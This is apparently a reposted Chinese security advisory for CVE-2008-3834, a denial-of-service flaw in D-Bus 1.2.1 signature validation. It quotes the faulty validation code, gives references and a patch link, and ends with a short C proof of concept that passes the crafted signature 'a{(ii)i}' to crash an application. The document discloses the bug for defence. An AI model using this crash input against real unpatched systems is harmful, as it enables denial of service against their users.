D-Bus dbus_signature_validate()类型签名拒绝服务漏洞---------- 红客中国安全网-红客网络改变世界,创造网络安全新纪元

HKC安全网软件公告

红客中国自主开发的红客网警系列软件将在10月隆重上市，敬请关注。（红客中国反入侵精灵将暂时停止下载）



	漏洞公告
	病毒公告
	安全聚焦
	技术文章

首页 > 安全资讯 > 漏洞公告

D-Bus dbus_signature_validate()类型签名拒绝服务漏洞

发布日期：2008-10-11 11:25:28 共阅0次

发布时间(Published):2008-10-06

影响版本(Vulnerable):

D-Bus 1.2.1

漏洞描述(Discription):

BUGTRAQ ID: 31602
CVE(CAN) ID: CVE-2008-3834

D-BUS是一个设计目标为应用程序间通信的消息总线系统。

D-BUS的_dbus_validate_signature_with_reason()函数没有正确地验证类型代码：

if (last == DBUS_DICT_ENTRY_BEGIN_CHAR &&
!dbus_type_is_basic (*p))
{
result = DBUS_INVALID_DICT_KEY_MUST_BE_BASIC_TYPE;
goto out;
}

如果使用D-Bus的应用受骗验证了特制的签名的话，就可能会终止。

<* 参考(References)

schelte （schelte@wanadoo.nl）
http://secunia.com/advisories/32127/
https://bugs.freedesktop.org/show_bug.cgi?format=multiple&id=17803

安全建议(solution):

D-Bus
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://admin.fedoraproject.org/updates/dbus-1.2.4-1.fc9

测试方法(Exploit):

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

#include <dbus/dbus.h>

int main ()
{
   return !dbus_signature_validate("a{(ii)i}", NULL);
}